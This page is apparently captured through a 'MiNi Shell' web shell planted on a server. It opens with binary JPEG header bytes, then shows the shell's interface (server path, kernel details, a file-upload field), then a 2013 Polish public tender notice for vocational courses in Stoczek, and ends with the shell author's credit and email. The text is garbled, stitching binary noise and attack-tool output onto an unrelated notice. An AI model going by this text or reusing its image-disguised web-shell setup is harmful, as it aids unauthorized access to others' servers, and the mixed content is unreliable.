JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/325532-N-2013.html

<p class="kh_header"><b>Stoczek: Kursy i szkolenia zawodowe dla uczestników projektu Kształcenie i samozatrudnienie drogą do sukcesu osób pozostających bez pracy z terenu Gminy Stoczek</b><br>
<b>Numer ogłoszenia: 325532 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stowarzyszenie na rzecz Rozwoju Gminy Stoczek , ul. Armii Krajowej 1, 07-104 Stoczek, woj. mazowieckie, tel. 25 691 91 77, faks 25 691 91 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.snrrgstoczek.vel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: organizacja pozarządowa - stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kursy i szkolenia zawodowe dla uczestników projektu Kształcenie i samozatrudnienie drogą do sukcesu osób pozostających bez pracy z terenu Gminy Stoczek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na organizacji i przeprowadzeniu kursów i szkoleń zawodowych dla 20 uczestników projektu Kształcenie 
i samozatrudnienie drogą do sukcesu osób pozostających bez pracy z terenu Gminy Stoczek współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Zakres tematyczny kursów i szkoleń realizowanych w ramach zamówienia:
1)	Dietetyka - kurs online dla 1 osoby, obejmujący min. 20 godzin wykładów i 30 godzin ćwiczeń. Tematyka kursu: poznanie zasad racjonalnego żywienia, poznanie zasad żywienia w wybranych chorobach cywilizacyjnych, poznanie zaleceń żywieniowych wybranych grup ludności, poznanie zasad planowania jadłospisów, nauczenie się układania diet m.in odchudzających i leczniczych,  zapoznanie się z dietetyką sportową i suplementacją w sporcie, zapoznaniem się z poradnictwem żywieniowym. Wykonawca zobowiązany jest zapewnić salę 
i sprzęt techniczny oraz materiały szkoleniowe w postaci drukowanej niezbędne do udziału w przedmiotowym szkoleniu. 
2)	Florystyka - kurs dla 5 osób, w wymiarze min. 50 godzin. Tematyka kursu: podstawy florystyki, technika układania kwiatów, zasady i styl kompozycji, florystyka okolicznościowa, florystyka ślubna, florystyka żałobna, pielęgnacja roślin, zasady profesjonalnej obsługi klienta, technika układania kwiatów, tworzenie ekspozycji wystawowych, florystyka komunijna i świąteczna. 
3)	Księgowość komputerowa z modułem kadry i płace - szkolenie dla 3 osób, 
w wymiarze min. 120 godzin.  Szkolenie ma na celu przygotowanie uczestników  w zakresie: wyliczania wynagrodzenie za pracę, rozliczania składek ZUS, posługiwania się programem Płatnik, kierowania zatrudnianych osób na wstępne badania lekarskie i psychologiczne, sporządzania umów o pracę, wprowadzania danych do komputera i archiwizowania (zakładania akt pracowniczych), przekazywania niezbędnych informacji do urzędów, wprowadzenia kandydata do pracy, skierowania na szkolenie wstępne z zakresu bhp i ppoż., ewidencjonowania i kontrolowania czasu pracy, zwolnień lekarskich i absencji, ustalenia, wg obowiązujących przepisów, stażów pracy skutkujących na urlop wypoczynkowy, wysokości nagród jubileuszowych, wymiaru okresu wypowiedzenia, uprawnień emerytalnych itp. 
4)	Pracownik Administracyjno-biurowy - kurs dla 4 osób, tym 1 osoba niepełnosprawna (niepełnosprawność nie wymaga przystosowania stanowiska pracy), w wymiarze min. 100 godzin zajęć. Minimalny zakres tematyczny kursu: zasady funkcjonowania biura i organizacji pracy biurowej, praktyczne umiejętności samodzielnego prowadzenia biura, zapoznanie z organizacją pracy biura, przepływem informacji w zarządzaniu biurem, zasadami efektywnej komunikacji, kultury zawodu, zagadnieniami prawnymi i prawem pracy, oraz zapoznanie z obsługą urządzeń biurowych, jak również z modułem praktycznej obsługi komputera (Word, Excel, Outlook, Internet) 
5)	Magazynier sprzedawca z obsługą komputera i kasy fiskalnej - kurs dla 4 osób w tym 1 osoba niepełnosprawna (niepełnosprawność nie wymaga przystosowania stanowiska pracy). Program kursu musi obejmować zajęcia teoretyczne i praktyczne w wymiarze min. 60 godzin.  
6)	Kurs na operatora koparko-ładowarki (wszystkie typy), klasy III - kurs dla 2 osób, Program kursu musi obejmować zajęcia teoretyczne i praktyczne i być zgodny z programem Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r. nr 118 poz. 1263) oraz innymi obowiązującymi przepisami, w tym zakresie. Kurs winien zakończyć się egzaminem państwowym.
7)	Kierowca (operator) wózka widłowego (wszystkie typy) wraz z wymianą butli - kurs dla 4 osób, w tym 1 osoba niepełnosprawna (niepełnosprawność nie wymaga przystosowania stanowiska pracy). Program kursu musi obejmować zajęcia teoretyczne i praktyczne w wymiarze min. 67 godzin i być zgodny 
z przepisami Rozporządzenia Ministra Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym, programem szkoleniowym zatwierdzonym lub opracowanym i zatwierdzonym przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach oraz innymi obowiązującymi przepisami, w tym zakresie. 
8)	Prawo jazdy kat C - kurs dla 1 osoby. Program kursu musi obejmować zajęcia teoretyczne i praktyczne i być realizowany zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. z dnia 14 września 2012 r. poz.1019) oraz innymi obowiązującymi przepisami, w tym zakresie. Kurs winien zakończyć się egzaminem państwowym.
9)	Kwalifikacja wstępna przyspieszona, kat. C - kurs kwalifikacyjny dla 1 osoby. Program kursu musi obejmować zajęcia teoretyczne i praktyczne w wymiarze min. 140 godzin  zgodnie z  Rozporządzeniem Ministra Infrastruktury z dn. 01.04.2010 r. w sprawie szkolenia kierowców wykonujących przewozy drogowe (Dz. U. z 2010 r. Nr 53, poz. 314 z późn. zm.) oraz innymi obowiązującymi przepisami, w tym zakresie. Kurs winien zakończyć się egzaminem państwowym.
Wykonawca ma obowiązek:
1)	Zorganizować i przeprowadzić ww kursy i szkolenia zgodnie z obowiązującymi przepisami prawa w tym Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216) oraz innymi obowiązującymi przepisami prawa w zakresie odpowiadającym poszczególnym kursom, przy czym miejsce organizacji poszczególnych kursów nie może znajdować się w odległości większej niż 70 km od siedziby zamawiającego. Zamawiający udostępni Wykonawcy salę na potrzeby realizacji kursu z zakresu florystyki.
2)	Ubezpieczyć uczestników szkoleń od następstw nieszczęśliwych wypadków. Kopie polisy ubezpieczeniowej Wykonawca przedstawi zamawiającemu najpóźniej w dniu rozpoczęcia zajęć.
3)	Przeszkolić wszystkich uczestników kursów z zakresu BHP w zakresie odpowiadającym każdemu z ww kursów.
4)	Opracować i przekazać zamawiającemu do akceptacji harmonogram kursów 
i szkoleń, który będzie uwzględniał, że niektóre osoby uczestniczą w więcej niż jednym kursie i szkoleniu, tj.:   
- Pierwsza osoba będzie brała udział w szkoleniach i kursach: Pracownik administracyjno - biurowy i Florystyka
- Druga osoba będzie brała udział w szkoleniach i kursach: Kierowca (operator) wózka widłowego oraz na operatora koparko - ładowarki,        
- Trzecia osoba będzie brała udział  w szkoleniach i kursach: Florystyka i Magazynier sprzedawca z obsługą komputera i kasy fiskalnej
5)	Zapewnić uczestnikom poszczególnych kursów:
- badania lekarskie w zakresie poszczególnych kursów, jeżeli ich przeprowadzenie jest wymagane do uczestnictwa w kursie.
- dostęp do sal wykładowych, sprzętu technicznego, materiału florystycznego oraz wszelkich pojazdów i placów manewrowych niezbędnych do organizacji poszczególnych kursów. 
- wszelkie niezbędne materiały i środki dydaktyczno-szkoleniowe, w przypadku dokumentów tekstowych muszą zostać przekazane w postaci drukowanej.
- serwis kawowy oraz ciepły posiłek (w postaci drugiego dania) podczas każdego dnia  w którym organizowane będą zajęcia bez względu na rodzaj prowadzonych zajęć.
6)	Wydać stosowne zaświadczenia lub certyfikaty uczestnikom kursu potwierdzające nabyte kwalifikacje z wyszczególnieniem ilości godzin, danego kursu i szkolenia, zgodnie z odrębnymi dla każdego kursu przepisami i wymogami.
W przypadku gdy do uzyskania stosownych zaświadczeń i certyfikatów niezbędny jest udział uczestników w egzaminach w tym państwowych, wykonawca zobowiązany jest do ich zorganizowania (wykonawca w cenie oferty winien ująć koszty związane z jednorazowym podejściem kursanta do egzaminu). 

Szczegółowe wymagania stawiane wykonawcy zawiera zał. nr 5 do SIWZ - istotne dla stron postanowienia umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 2).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
1) Wypełniony i podpisany Formularz oferty (zał. 1 do SIWZ).
2) Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust 1 ustawy (zał. nr 2 do SIWZ).
3) Oświadczenia i dokumenty potwierdzające, że wykonawca spełnia warunki udziału w postępowaniu oraz dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy - wymienione w pkt. 10 SIWZ.
4) Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacja o tym, że wykonawca nie należy do grupy kapitałowej (zał. nr 4 do SIWZ).
5) Pełnomocnictwo do podpisywania oferty i jej załączników, o ile  nie wynika  ono z innych dokumentów załączonych przez Wykonawcę. Pełnomocnictwo musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany i uzupełnienia niniejszej umowy, jak również wszelkie zawiadomienia, zapytania lub informacje odnoszące się do lub wynikające z wykonania przedmiotu umowy wymagają formy pisemnej, pod rygorem nieważności.
Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności, z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
Strony ustalają, że postanowienia umowy mogą być zmienione w sytuacji:
a)	wystąpienia siły wyższej;
b)	wystąpienia okoliczności, których Strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
Zamawiający przewiduje również możliwość dokonania zmian i uzupełnień w niniejszej umowie, które nie stanowią istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (zmiany zgodne 
z dyspozycją art. 144 ustawy), z tym zastrzeżeniem, iż zmiany te nie będą naruszać naczelnych zasad udzielania zamówień publicznych, a w szczególności uczciwej konkurencji i równego traktowania Wykonawcy oraz zmieniać zakresu i przedmiotu zamówienia oraz jego warunków i treści oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.standardypomocy.stoczek.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stowarzyszenie Na Rzecz Rozwoju Gminy Stoczek przy ul. Armii Krajowej 1 w Stoczku - Sekretariacie NLO w Stoczku (pokój nr 2).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2013 godzina 10:00, miejsce: Stowarzyszenie Na Rzecz Rozwoju Gminy Stoczek przy ul. Armii Krajowej 1 w Stoczku - Sekretariacie NLO w Stoczku (pokój nr 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kursy i szkolenia zawodowe dla beneficjentów ostatecznych projektu pn.: Kształcenie i samo zatrudnienie drogą 
do sukcesu osób pozostających bez pracy z terenu Gminy Stoczek realizowane są w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet I: Zatrudnienie i integracja społeczna Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com